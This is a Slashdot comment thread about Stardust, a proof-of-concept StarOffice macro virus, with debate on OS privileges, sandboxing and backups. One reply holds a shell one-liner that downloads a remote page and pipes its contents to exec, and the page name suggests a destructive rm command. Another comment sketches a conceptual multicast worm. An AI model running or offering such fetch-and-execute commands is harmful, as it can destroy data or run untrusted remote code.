First StarOffice Virus Sighted

Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."

it's still basically a OS security issue

[yagu]

First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.

Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

Re:it's still basically a OS security issue

[99BottlesOfBeerInMyF]

Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficient access to do damage, including erasing personal files and likely even connecting to the internet and sending spam or a DoS attack. Programs like this will have vulnerabilities. Right now, this is not too serious of a threat. A real piece of malware based on this would probably not even propagate anywhere, however it is a valid issue going forward, especially if market share increases.

The solution in my mind is twofold. First, institute a VM, or Mandatory access control, or jail or whatever you want to call it for all applications. This would limit the exposure from the user directory, to just the files and network access of the application, unless the user specifically allowed the behavior. The second component is a versioned filesystem with redundancy to make sure any files it overwrote could be quickly and painlessly rolled back to the uncorrupted version. This still leaves some room for damage. A subtle malware could add text to a document that might be overlooked, and some clever social engineering could expand the attack. Still, I think both of these are logical directions for security improvements.

Re:it's still basically a OS security issue

[blibbler]

A Jail for all programs? I am no free software advocate, but that seems pretty extreme! Can't you give them a warning, or at least probation?

Re:it's still basically a OS security issue

[chill]

If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

I don't, nor do I known anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

  -Charles

Why go through the trouble?

[MagicM]

If you want to trick someone into viewing an image, why not just embed the image in the document?

Where is the "proof" (and the "virus") in this "proof of concept virus"?

Proof of Concept to infect the planet

[packetmon]

I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting ? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.

Re:Virus!?

[IAmTheDave]

I don't call that a virus, I call it a feature.

Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.

I knew it was insecure.

Re:A Virus

[packetmon]

What do you think would happen if someone scripted something into it... Remember its a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec

Yawn

[jofi]

So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.

Meet my mother

[atrocious+cowpat]

"I don't, nor do I known anyone that does, back up their /home folder daily."

My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a seperate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

It may seem like overkill, but I set things up this way not because I'm scared of the havock a virus might wreak, but because I know that my mother every once in a while f*s up, deletes or otherwise ruins important files, preferably spreadsheets that are extremely painful to reconstruct. Her own files - not system files. And usually she doesn't notice until either 3 days or 3 months later.

I sleep well, she can do whatever she wants, and everyone is happy.